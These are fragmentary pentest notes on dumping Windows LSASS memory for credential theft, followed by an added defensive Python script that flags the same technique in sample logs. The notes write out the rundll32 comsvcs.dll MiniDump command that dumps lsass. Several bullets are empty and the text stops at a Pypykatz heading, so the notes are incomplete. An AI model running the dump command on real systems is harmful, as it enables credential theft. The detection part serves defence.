Attacking LSASS

  • Upon initial logon, LSASS will:

Dumping LSASS Process Memory

Task Manager Method

  • A file called lsass.DMP is created and saved in:

C:\Users\loggedonusersdirectory\AppData\Local\Temp

Rundll32.exe & Comsvcs.dll Method

  • Modern anti-virus tools recognize this method as malicious activity.

  • Before issuing the command to create the dump file, we must determine what process ID (PID) is assigned to lsass.exe.

  • This can be done from cmd or PowerShell:

Finding LSASS PID in cmd

tasklist /svc

Finding LSASS PID in PowerShell

Get-Process lsass

Creating lsass.dmp using PowerShell

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
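From the defender's side, the two methods above leave distinct traces: a rundll32 command line naming comsvcs.dll and MiniDump with a target PID, and a file named lsass.DMP written by Task Manager. The following is an added example, not code from the original page: it parses a constructed `tasklist /svc` sample to learn the lsass.exe PID, then triages constructed process-creation and file-creation events (hypothetical field names, loosely shaped like Sysmon Event ID 1 and 11) and raises the severity when the MiniDump target PID matches lsass.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample of `tasklist /svc` output (not captured from a real host).
TASKLIST_SVC = """\
Image Name                     PID Services
========================= ======== ============================================
System                           4 N/A
lsass.exe                      672 KeyIso, SamSs, VaultSvc
svchost.exe                    904 BrokerInfrastructure, DcomLaunch, Power
"""

# Constructed telemetry with hypothetical field names (not real event logs).
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full"},
    {"type": "process", "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"type": "file", "image": r"C:\Windows\System32\Taskmgr.exe",
     "target": r"C:\Users\alice\AppData\Local\Temp\lsass.DMP"},
    {"type": "file", "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\alice\Documents\notes.txt"},
]

# Matches the comsvcs.dll MiniDump invocation and captures the target PID.
MINIDUMP_RE = re.compile(r"comsvcs\.dll\s*,\s*MiniDump\s+(\d+)", re.IGNORECASE)


def lsass_pid_from_tasklist(output: str) -> Optional[int]:
    """Return the PID of lsass.exe from `tasklist /svc` text, or None if absent."""
    for line in output.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0].lower() == "lsass.exe" and parts[1].isdigit():
            return int(parts[1])
    return None


def comsvcs_minidump_pid(cmdline: str) -> Optional[int]:
    """Return the PID a comsvcs.dll MiniDump command line targets, or None."""
    m = MINIDUMP_RE.search(cmdline)
    return int(m.group(1)) if m else None


def is_lsass_dump_file(path: str) -> bool:
    """True when the created file is named lsass.dmp (any case, any directory)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower() == "lsass.dmp"


def triage(events: List[dict], lsass_pid: Optional[int]) -> List[Tuple[str, str]]:
    """Return (severity, reason) alerts for events matching either dump method."""
    alerts = []
    for ev in events:
        if ev["type"] == "process":
            pid = comsvcs_minidump_pid(ev["cmdline"])
            if pid is not None:  # MiniDump of the known lsass PID is the strongest signal
                sev = "high" if pid == lsass_pid else "medium"
                alerts.append((sev, f"comsvcs.dll MiniDump of PID {pid}"))
        elif ev["type"] == "file" and is_lsass_dump_file(ev["target"]):
            alerts.append(("high", f"{ev['image']} wrote {ev['target']}"))
    return alerts
```

Running `triage(SAMPLE_EVENTS, lsass_pid_from_tasklist(TASKLIST_SVC))` flags the rundll32 line and the Task Manager write, and ignores the benign rundll32 and explorer events.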

Using Pypykatz to Extract Credentials
